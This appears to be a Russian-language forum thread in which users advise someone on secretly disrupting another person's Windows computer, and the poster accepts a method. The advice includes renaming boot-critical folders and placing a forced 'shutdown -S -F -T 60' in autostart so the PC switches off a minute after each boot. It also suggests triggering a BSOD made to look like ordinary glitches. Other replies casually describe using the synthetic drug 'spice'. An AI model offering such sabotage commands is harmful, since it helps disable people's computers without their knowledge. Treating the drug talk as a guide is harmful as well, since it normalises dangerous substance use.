я абсолютно спокоен ибо у меня есть чуть чуть ништяков типа спайс .D // неповерите, в магазине купил ))
Понапишите тоже, это если только в Win 3.1 приминимо да 98. Ins3t написал самый верный и простой сбособ, но чтобы не комплитить, вот на BAT: Ставите в расписания = профит.
От обычного дубаса я залипаю часто и вообще разговаривать впадлу. А эта хрень и прет сильнее и настрой ок, хотя не долго совсем.
на хабре недавно была статейка как любую виндовс вплоть до 8 опускать в BSOD несколькими незамысловатыми строками кода. можно это запилить, вообще безпалевно будет, типа просто венда глючит.
о боже ну ошибся с синтаксисом чуток, cd c:/ ren Windows Huindows shutdown -S -F и да виндовс папку не перименовать но какой нить другой файл или папку которая при загрузке нужна получится думаю или еще смешнее в авто загрузку shutdown -S -F -T 60 и будет комп выключатся через минуту после загрузки и привет а ты инсетушка кончай прокуривать мосг говном, а то что бы поссать сходить скоро будешь алгоритмы придумывать
Выбрал этот вариант как самый простой, всем большое спасибо! Не ожидал что откликнется много народу. Уважаемый, какой из меня родственник не ваше дело.